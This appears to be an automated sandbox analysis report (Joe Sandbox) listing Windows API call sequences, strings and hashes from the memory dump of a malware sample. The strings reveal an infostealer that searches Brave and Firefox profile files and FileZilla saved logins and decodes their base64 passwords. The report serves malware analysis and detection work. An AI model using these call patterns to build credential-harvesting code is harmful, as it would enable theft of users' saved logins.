                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADBE4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADBEF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003ADBFA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC17
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003ADC23
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADC4C
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADC8F
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADCBF
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003ADCD0
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003ADCF0
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003ADD0A
                          • lstrlen.KERNEL32(003CCFEC), ref: 003ADD1D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003ADD47
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADD70
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADD7B
                          • lstrlen.KERNEL32(003D1794), ref: 003ADD86
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDA3
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADDAF
                          • lstrlen.KERNEL32(?), ref: 003ADDBC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADDDF
                          • lstrcat.KERNEL32(00000000,?), ref: 003ADDED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADE19
                          • lstrlen.KERNEL32(003D1794), ref: 003ADE3D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADE6F
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADE7B
                          • lstrlen.KERNEL32(00F29408), ref: 003ADE8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADEB0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADEBB
                          • lstrlen.KERNEL32(003D1794), ref: 003ADEC6
                          • lstrcpy.KERNEL32(00000000,?), ref: 003ADEE6
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADEF2
                          • lstrlen.KERNEL32(00F290F8), ref: 003ADF01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF27
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADF32
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADF5E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFA5
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003ADFB1
                          • lstrlen.KERNEL32(00F29408), ref: 003ADFC0
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003ADFE9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003ADFF4
                          • lstrlen.KERNEL32(003D1794), ref: 003ADFFF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE022
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003AE02E
                          • lstrlen.KERNEL32(00F290F8), ref: 003AE03D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE063
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003AE06E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE09A
                          • StrCmpCA.SHLWAPI(?,Brave), ref: 003AE0CD
                          • StrCmpCA.SHLWAPI(?,Preferences), ref: 003AE0E7
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE11F
                          • lstrlen.KERNEL32(00F2D6C0), ref: 003AE12E
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE155
                          • lstrcat.KERNEL32(00000000,?), ref: 003AE15D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE19F
                          • lstrcat.KERNEL32(00000000), ref: 003AE1A9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003AE1D0
                          • CopyFileA.KERNEL32(00000000,?,00000001), ref: 003AE1F9
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003AE22F
                          • lstrlen.KERNEL32(00F290B8), ref: 003AE23D
                          • lstrcpy.KERNEL32(00000000,?), ref: 003AE261
                          • lstrcat.KERNEL32(00000000,00F290B8), ref: 003AE269
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003AE988
                          • FindClose.KERNEL32(00000000), ref: 003AE997
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                          • String ID: Brave$Preferences$\Brave\Preferences
                          • API String ID: 1346089424-1230934161
                          • Opcode ID: a8600c12cc1cd8c123ffd78d04f93aab06703cb059d4cd38e71ba2ac0c31f633
                          • Instruction ID: e973a1863be94fe89276972b195013e7604249e874ce5759d5696e8de6249dbf
                          • Opcode Fuzzy Hash: a8600c12cc1cd8c123ffd78d04f93aab06703cb059d4cd38e71ba2ac0c31f633
                          • Instruction Fuzzy Hash: D6529F71A112169BCB22EFB8DC89AAF77B9EF56700F05442AF806DB651DB34DC05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A60FF
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6152
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6185
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A61B5
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A61F0
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A6223
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 003A6233
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$InternetOpen
                          • String ID: "$------
                          • API String ID: 2041821634-2370822465
                          • Opcode ID: c118bea9f51bf039b73223947ca1bdbf89e4d760ffba4ad8718c5a279f43f42a
                          • Instruction ID: aa8a5872a329370e1cb956e2fcad079143aa84d0e7e88aee458f47bd29ed278f
                          • Opcode Fuzzy Hash: c118bea9f51bf039b73223947ca1bdbf89e4d760ffba4ad8718c5a279f43f42a
                          • Instruction Fuzzy Hash: 90524C71E112169BCB22EBA8DC49BAF77B9EF55700F19442AF805EB251DB34EC05CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6B9D
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BCD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6BFD
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B6C2F
                          • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 003B6C3C
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003B6C43
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 003B6C5A
                          • lstrlen.KERNEL32(00000000), ref: 003B6C65
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6CA8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6CCF
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 003B6CE2
                          • lstrlen.KERNEL32(00000000), ref: 003B6CED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6D30
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6D57
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 003B6D6A
                          • lstrlen.KERNEL32(00000000), ref: 003B6D75
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6DB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6DDF
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 003B6DF2
                          • lstrlen.KERNEL32(00000000), ref: 003B6E01
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6E49
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B6E71
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 003B6E94
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 003B6EA8
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 003B6EC9
                          • LocalFree.KERNEL32(00000000), ref: 003B6ED4
                          • lstrlen.KERNEL32(?), ref: 003B6F6E
                          • lstrlen.KERNEL32(?), ref: 003B6F81
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 2641759534-2314656281
                          • Opcode ID: c357fbfebc710e8c99c11aefcb69b5be3413dfac9e98359dc5f13dbbd508e840
                          • Instruction ID: a49903fb5f327cf1ee086c93da05b89e76c6ca54138fcf939eadc761da3be8ee
                          • Opcode Fuzzy Hash: c357fbfebc710e8c99c11aefcb69b5be3413dfac9e98359dc5f13dbbd508e840
                          • Instruction Fuzzy Hash: 3702B131A11216ABCB22EBB8DC4AEAF7B79EF15704F05041AF906EB652DB34DD05C760
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B4B51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4B74
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B4B7F
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B4B8A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BA7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B4BB3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B4BDE
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B4BFA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: prefs.js
                          • API String ID: 2567437900-3783873740
                          • Opcode ID: c176a2afabc18d8357e69863cf484e9af09e2b9b2dc87506327466c83e85b97d
                          • Instruction ID: 72e9353599a3316a0b66cf8abb5a2c40e3443e720fcae809bb32b2ad647d63c6
                          • Opcode Fuzzy Hash: c176a2afabc18d8357e69863cf484e9af09e2b9b2dc87506327466c83e85b97d
                          • Instruction Fuzzy Hash: 81927430A026118FDB26DF29D948BAAB7F5BF45718F1A806EE509DB762D731DC41CB80
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B12BF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12E7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B133A
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B135C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1376
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B13E2
                          • lstrlen.KERNEL32(003D1794), ref: 003B13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B140A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1416
                          • lstrlen.KERNEL32(?), ref: 003B1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1443
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B147A
                          • StrCmpCA.SHLWAPI(?,00F2D810), ref: 003B14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1535
                          • StrCmpCA.SHLWAPI(?,00F2DBC0), ref: 003B1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B15E4
                          • StrCmpCA.SHLWAPI(?,00F2D7E0), ref: 003B1602
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1633
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B165C
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1685
                          • StrCmpCA.SHLWAPI(?,00F2D780), ref: 003B16B3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B16F4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B171D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1745
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B181C
                          • FindClose.KERNEL32(00000000), ref: 003B182B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Findlstrlen$File$CloseFirstNext
                          • String ID:
                          • API String ID: 1346933759-0
                          • Opcode ID: eeb5278f064232e11521dddd743e343c5b068b5a3f20a29d1db5f1065f991bdf
                          • Instruction ID: ee3d49b05e14970222831fe33e985a27c28c92033d8f973ed2d3d957d5f881fa
                          • Opcode Fuzzy Hash: eeb5278f064232e11521dddd743e343c5b068b5a3f20a29d1db5f1065f991bdf
                          • Instruction Fuzzy Hash: 96129C71A112069BCB26EF78D899AAF77B8EF45304F45452EF846D7A50EF30DC058B90
                          APIs
                          • wsprintfA.USER32 ref: 003BCBFC
                          • FindFirstFileA.KERNEL32(?,?), ref: 003BCC13
                          • lstrcat.KERNEL32(?,?), ref: 003BCC5F
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003BCC71
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003BCC8B
                          • wsprintfA.USER32 ref: 003BCCB0
                          • PathMatchSpecA.SHLWAPI(?,00F290E8), ref: 003BCCE2
                          • CoInitialize.OLE32(00000000), ref: 003BCCEE
                            • Part of subcall function 003BCAE0: CoCreateInstance.COMBASE(003CB110,00000000,00000001,003CB100,?), ref: 003BCB06
                            • Part of subcall function 003BCAE0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 003BCB46
                            • Part of subcall function 003BCAE0: lstrcpyn.KERNEL32(?,?,00000104), ref: 003BCBC9
                          • CoUninitialize.COMBASE ref: 003BCD09
                          • lstrcat.KERNEL32(?,?), ref: 003BCD2E
                          • lstrlen.KERNEL32(?), ref: 003BCD3B
                          • StrCmpCA.SHLWAPI(?,003CCFEC), ref: 003BCD55
                          • wsprintfA.USER32 ref: 003BCD7D
                          • wsprintfA.USER32 ref: 003BCD9C
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 003BCDB0
                          • wsprintfA.USER32 ref: 003BCDD8
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 003BCDF1
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 003BCE10
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 003BCE28
                          • CloseHandle.KERNEL32(00000000), ref: 003BCE33
                          • CloseHandle.KERNEL32(00000000), ref: 003BCE3F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003BCE54
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BCE94
                          • FindNextFileA.KERNEL32(?,?), ref: 003BCF8D
                          • FindClose.KERNEL32(?), ref: 003BCF9F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Filewsprintf$CloseFind$CreateHandleMatchPathSpeclstrcat$ByteCharCopyFirstInitializeInstanceMultiNextSizeUninitializeUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpylstrcpynlstrlen
                          • String ID: %s%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 3860919712-2388001722
                          • Opcode ID: bba3aea64adc3b25d72b29331c21d396d0edb49b021104d1ada8ffa7fd8e9194
                          • Instruction ID: 04b3c65849a0bf8bdae80306971b8515452f125637dfa74d4a81879c121ca3b1
                          • Opcode Fuzzy Hash: bba3aea64adc3b25d72b29331c21d396d0edb49b021104d1ada8ffa7fd8e9194
                          • Instruction Fuzzy Hash: 3EC17071A11219ABCB25DF64DC49EEE7779FF94305F00459AF609A7290EE30AE44CF90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B1291
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12B4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B12BF
                          • lstrlen.KERNEL32(003D4CA8), ref: 003B12CA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B12E7
                          • lstrcat.KERNEL32(00000000,003D4CA8), ref: 003B12F3
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B131E
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B133A
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003B135C
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003B1376
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B13AF
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B13D7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B13E2
                          • lstrlen.KERNEL32(003D1794), ref: 003B13ED
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B140A
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003B1416
                          • lstrlen.KERNEL32(?), ref: 003B1423
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1443
                          • lstrcat.KERNEL32(00000000,?), ref: 003B1451
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B147A
                          • StrCmpCA.SHLWAPI(?,00F2D810), ref: 003B14A3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B14E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B150D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1535
                          • StrCmpCA.SHLWAPI(?,00F2DBC0), ref: 003B1552
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1593
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B15BC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B15E4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B1796
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B17BE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003B17F5
                          • FindNextFileA.KERNEL32(00000000,?), ref: 003B181C
                          • FindClose.KERNEL32(00000000), ref: 003B182B
                          Memory Dump Source
